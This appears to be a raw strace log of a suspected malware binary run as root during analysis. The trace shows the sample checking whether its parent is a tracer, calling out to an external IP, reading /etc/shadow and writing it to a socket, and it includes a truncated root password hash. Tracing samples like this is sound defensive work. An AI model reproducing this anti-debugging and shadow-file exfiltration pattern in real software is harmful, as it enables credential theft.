[root@i-0spjvlla bot]# strace -f ./47dedb0a5a40ff81d5d59f39f93bb5dd7ffebcc09b6d6

1. [root@i-0spjvlla bot]# strace -f ./47dedb0a5a40ff81d5d59f39f93bb5dd7ffebcc09b6d6247d30cef12ee7d8662
2. execve("./47dedb0a5a40ff81d5d59f39f93bb5dd7ffebcc09b6d6247d30cef12ee7d8662", ["./47dedb0a5a40ff81d5d59f39f93bb5"...], [/* 22 vars */]) = 0
3. uname({sys="Linux", node="i-0spjvlla", ...}) = 0
4. brk(0) = 0x20d3000
5. brk(0x20d41c0) = 0x20d41c0
6. arch_prctl(ARCH_SET_FS, 0x20d3880) = 0
7. readlink("/proc/self/exe", "/data/bot/47dedb0a5a40ff81d5d59f"..., 4096) = 74
8. brk(0x20f51c0) = 0x20f51c0
9. brk(0x20f6000) = 0x20f6000
10. access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)
11. getppid() = 16804
12. open("/proc/16804/cmdline", O_RDONLY) = 3
13. read(3, "strace\0-f\0./47dedb0a5a40ff81d5d5", 32) = 32
14. close(3) = 0
15. getppid() = 16804
16. open("/proc/16804/status", O_RDONLY) = 3
17. read(3, "Name:\tstrace\nState:\tS (sleeping)", 32) = 32
18. close(3) = 0
19. socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
20. connect(3, {sa_family=AF_INET, sin_port=htons(179), sin_addr=inet_addr("198.216.87.22")}, 16) = -1 ETIMEDOUT (Connection timed out)
21. open("/etc/shadow", O_RDONLY) = 4
22. socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5
23. connect(5, {sa_family=AF_INET, sin_port=htons(2222), sin_addr=inet_addr("127.127.127.127")}, 16) = -1 ECONNREFUSED (Connection refused)
24. read(4, "root:$6$3IDK7UQk$4qP6R5nocX2DVpL"..., 1024) = 678
25. write(5, "root:$6$3IDK7UQk$4qP6R5nocX2DVpL"..., 678) = -1 EPIPE (Broken pipe)
26. --- SIGPIPE {si_signo=SIGPIPE, si_code=SI_USER, si_pid=16809, si_uid=0} ---